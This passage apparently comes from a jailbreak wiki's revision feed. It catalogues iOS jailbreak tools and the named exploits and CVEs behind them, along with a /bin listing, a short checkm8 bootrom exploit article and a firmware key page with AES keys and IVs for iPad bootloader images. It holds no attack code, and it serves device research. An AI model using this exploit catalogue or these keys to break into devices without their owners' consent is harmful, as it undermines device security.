* sockpuppet ({{cve|2019-8527}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* sockpuppet ({{cve|2019-8527}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

* oob_timestamp ({{cve|2020-3837}})
* tachy0n (lightspeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Jailbreak Exploits

2020-06-01T23:50:35Z

Inflatable Man: /* Unc0ver (13.0 - 13.5) */ Added tachy0n exploit.

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* sockpuppet ({{cve|2019-8527}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* sockpuppet ({{cve|2019-8527}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

* oob_timestamp ({{cve|2020-3837}})
* tachy0n (originally dubbed "lightspeed") ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

User:Inflatable Man

2020-05-28T22:23:57Z

Inflatable Man: User page

There is currently text in this page.

/bin

2020-05-27T19:18:43Z

Inflatable Man: /* Files */

Folder that contains GNU Coreutils. The GNU Core Utilities are the basic file, shell and text manipulation utilities of the GNU operating system. These are the core utilities which are expected to exist on every operating system. Most of the files here are installed with a jailbreak except for df and ps.

== Children ==
=== Folders ===

There are no folders that exist inside of /bin.

=== Files ===

* bash
* bunzip2
* bzcat
* bzip2
* bzip2recover
* cat
* chgrp
* chmod
* chown
* cp
* date
* dd
* df (present in jailed iOS)
* dir
* echo
* egrep
* false
* fgrep
* grep
* gunzip
* gzexe
* gzip
* kill
* [[launchctl]]
* ln
* ls
* mkdir
* mknod
* mktemp
* mv
* ps (present in jailed iOS)
* pwd
* [[readlink]]
* rm
* rmdir
* se
* sh
* sleep
* stty
* [[su]]
* sync
* tar
* touch
* true
* uname
* uncompress
* vdir
* zcat
* zcmp
* zdiff
* zegrep
* zfgrep
* zforce
* zgrep
* zless
* zmore
* znew

== Parents ==
{{parent}}

[[Category:Filesystem]]

Checkm8 Exploit

2020-05-27T18:36:05Z

Inflatable Man: Fixed URL title in the references section.

{{lowercase}}
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, and bridgeOS devices with processors between an A5 and an A11 or a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.

[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit.

== References ==
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]
* [https://news.ycombinator.com/item?id=22849837 https://news.ycombinator.com/item?id=22849837]

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

Checkm8 Exploit

2020-05-27T18:35:15Z

Inflatable Man: Replaced "Touch Bar" with "bridgeOS" and added a reference for it.

{{lowercase}}
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, and bridgeOS devices with processors between an A5 and an A11 or a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.

[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit.

== References ==
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]
* [https://news.ycombinator.com/item?id=22849837]

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

PeaceGSeed 16G5027i (iPad6,11)

2020-05-27T16:48:45Z

Inflatable Man: Corrected typo for "beta" mispelled as "b eta".

{{keys
| Version = 12.4 beta 2
| Build = 16G5027i
| Device = iPad6,11
| Codename = PeaceGSeed
| DownloadURL = https://updates.cdn-apple.com/2019SpringSeed/fullrestores/041-66048/ED16905A-78AD-11E9-8C63-A1A6CED02F5C/iPad_64bit_TouchID_ASTC_12.4_16G5027i_Restore.ipsw

| Model = J71sAP
| Model2 = J71tAP

| RootFS = 048-80921-012
| RootFSKey = Not Encrypted

| UpdateRamdisk = 048-81265-012
| UpdateRamdiskIV = Not Encrypted

| RestoreRamdisk = 048-80913-012
| RestoreRamdiskIV = Not Encrypted

| AOPFirmware = aopfw-ipad6faop.im4p
| AOPFirmwareIV = Not Encrypted

| AppleLogo = applelogo@2x~ipad.im4p
| AppleLogoIV = Not Encrypted

| BatteryCharging0 = batterycharging0@2x~ipad.im4p
| BatteryCharging0IV = Not Encrypted

| BatteryCharging1 = batterycharging1@2x~ipad.im4p
| BatteryCharging1IV = Not Encrypted

| BatteryFull = batteryfull@2x~ipad.im4p
| BatteryFullIV = Not Encrypted

| BatteryLow0 = batterylow0@2x~ipad.im4p
| BatteryLow0IV = Not Encrypted

| BatteryLow1 = batterylow1@2x~ipad.im4p
| BatteryLow1IV = Not Encrypted

| DeviceTree = DeviceTree.j71sap.im4p
| DeviceTreeIV = Not Encrypted

| DeviceTree2 = DeviceTree.j71tap.im4p
| DeviceTree2IV = Not Encrypted

| GlyphPlugin = glyphplugin@2x~ipad-lightning.im4p
| GlyphPluginIV = Not Encrypted

| iBEC = iBEC.ipad6f.RELEASE.im4p
| iBECIV = 6b598a23bcc4b8449a6328fcb6c4bb08
| iBECKey = 1618a1e4bdcd9e8d5dbe777f0bb962844b8a015f21b229c1e2f85ec37f0c664a

| iBEC2 = iBEC.j71t.RELEASE.im4p
| iBEC2IV = Unknown
| iBEC2Key = Unknown
| iBEC2KBAG = f82cd5904db534abd6f218c9d6ca327aa744895d65ba46d00b0def1fbda1d836c21fadf3ade6bd603935ea4c6529365b

| iBoot = iBoot.ipad6f.RELEASE.im4p
| iBootIV = bff6412e78a030b1d2ff03350db620e8
| iBootKey = 146b42decb9850ba20e663c55528b349f57dc64314dcd3d7e40ddef94667e0cb

| iBoot2 = iBoot.j71t.RELEASE.im4p
| iBoot2IV = Unknown
| iBoot2Key = Unknown
| iBoot2KBAG = 66805c9e1d8a9c35528e67cc74d5ccc90ff03a87cf71cc6c2ac700f809dee7710d59fce17148b21436216c73535e2b84

| iBSS = iBSS.ipad6f.RELEASE.im4p
| iBSSIV = e74fd06e51914ba023cdb775b90133a5
| iBSSKey = be5d767c69559c47a342a2199dbeac5cc472bc25a8bf40a7f666032f731980f0

| iBSS2 = iBSS.j71t.RELEASE.im4p
| iBSS2IV = Unknown
| iBSS2Key = Unknown
| iBSS2KBAG = 76070961d028d915b5c25a9d2fd91c61e1a6836dae34bee1f2367b439f269d578af0e3dfcbbdf39bc6cd1477afe4f7b1

| Kernelcache = kernelcache.release.ipad6f
| KernelcacheIV = Not Encrypted

| LLB = LLB.ipad6f.RELEASE.im4p
| LLBIV = e930cf44dd53dcaa51fbeadc559d18e6
| LLBKey = 8fb6b100a7978975eced0de9e0c053bb1f024248d357b025b94aff4db2aed639

| LLB2 = LLB.j71t.RELEASE.im4p
| LLB2IV = Unknown
| LLB2Key = Unknown
| LLB2KBAG = 47c913abdc63f8759fe3da0076b7b0379b8feb5b78cc03975abb5d4bdd78f58f81fa942526aa3db723086efd80deeb36

| RecoveryMode = recoverymode@2x~ipad-lightning.im4p
| RecoveryModeIV = Not Encrypted

| SEPFirmware = sep-firmware.j71s.RELEASE.im4p
| SEPFirmwareIV = Unknown
| SEPFirmwareKey = Unknown
| SEPFirmwareKBAG = a5032e4b514115acefbe585bcd75e59fddc9a19b8b1ef61318fd21883c9eee52360b2fbb7585d7ec866f50bd1feab4b5

| SEPFirmware2 = sep-firmware.j71t.RELEASE.im4p
| SEPFirmware2IV = Unknown
| SEPFirmware2Key = Unknown
| SEPFirmware2KBAG = f05ed7eb9a99ebeb05c57e25cc686760a1a6eeeab00c515dc4c1e35088a4c2812e07a459ae5b5a46c94d003b7fa69a50
}}